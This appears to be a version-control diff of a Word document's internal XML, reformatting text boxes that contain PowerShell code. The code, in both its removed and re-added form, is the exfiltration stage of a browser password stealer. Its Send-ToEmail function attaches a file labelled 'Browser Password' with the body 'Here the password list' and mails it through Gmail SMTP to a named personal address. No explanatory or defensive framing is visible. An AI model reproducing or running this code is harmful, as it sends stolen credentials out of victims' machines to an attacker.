-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Net.Mail.MailMessage</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>;</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.From</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = $Username;</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $message.</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>To.Add</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($email);</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.Subject</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = "Browser Password";</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.Body</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = "Here the password list";</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $attachment = New-Object </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Net.Mail.Attachment</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($attachmentpath);</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.Attachments.Add</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($attachment);</w:t>
+                              <w:t>function Send-ToEmail([string]$email, [string]$attachmentpath){</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31512,25 +28264,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $smtp = new-object </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Net.Mail.SmtpClient</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>("smtp.gmail.com", "587");</w:t>
+                              <w:t xml:space="preserve">    $message = new-object Net.Mail.MailMessage;</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31547,25 +28281,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>smtp.EnableSSL</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = $TRUE;</w:t>
+                              <w:t xml:space="preserve">    $message.From = $Username;</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31582,25 +28298,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>smtp.Credentials</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                              <w:t xml:space="preserve">    $message.To.Add($email);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31617,25 +28315,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>smtp.send</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($message);</w:t>
+                              <w:t xml:space="preserve">    $message.Subject = "Browser Password";</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31652,25 +28332,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    write-host "Mail Sent</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>" ;</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> </w:t>
+                              <w:t xml:space="preserve">    $message.Body = "Here the password list";</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31687,25 +28349,135 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
+                              <w:t xml:space="preserve">    $attachment = New-Object Net.Mail.Attachment($attachmentpath);</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>attachment.Dispose</w:t>
+                              <w:t xml:space="preserve">    $message.Attachments.Add($attachment);</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramEnd"/>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>();</w:t>
+                              <w:t xml:space="preserve">    $smtp = new-object Net.Mail.SmtpClient("smtp.gmail.com", "587");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $smtp.EnableSSL = $TRUE;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $smtp.Credentials = New-Object System.Net.NetworkCredential($Username, $Password);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $smtp.send($message);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    write-host "Mail Sent" ; </w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                                <w:sz w:val="20"/>
+                                <w:szCs w:val="20"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">    $attachment.Dispose();</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -31739,25 +28511,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>Send-</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>ToEmail  -</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
+                              <w:t>Send-ToEmail  -email "abdulazies55@gmail.com" -attachmentpath $path;</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -31862,271 +28616,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>function Send-ToEmail([string]$email, [string]$</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>attachmentpath){</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $message = new-object </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Net.Mail.MailMessage</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>;</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.From</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = $Username;</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $message.</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>To.Add</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($email);</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.Subject</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = "Browser Password";</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.Body</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> = "Here the password list";</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $attachment = New-Object </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Net.Mail.Attachment</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($attachmentpath);</w:t>
-                      </w:r>
-                    </w:p>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve">    $</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>message.Attachments.Add</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>($attachment);</w:t>
+                        <w:t>function Send-ToEmail([string]$email, [string]$attachmentpath){</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -32152,25 +28642,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">    $smtp = new-object </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>Net.Mail.SmtpClient</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>("smtp.gmail.com", "587");</w:t>
+                        <w:t xml:space="preserve">    $message = new-object Net.Mail.MailMessage;</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
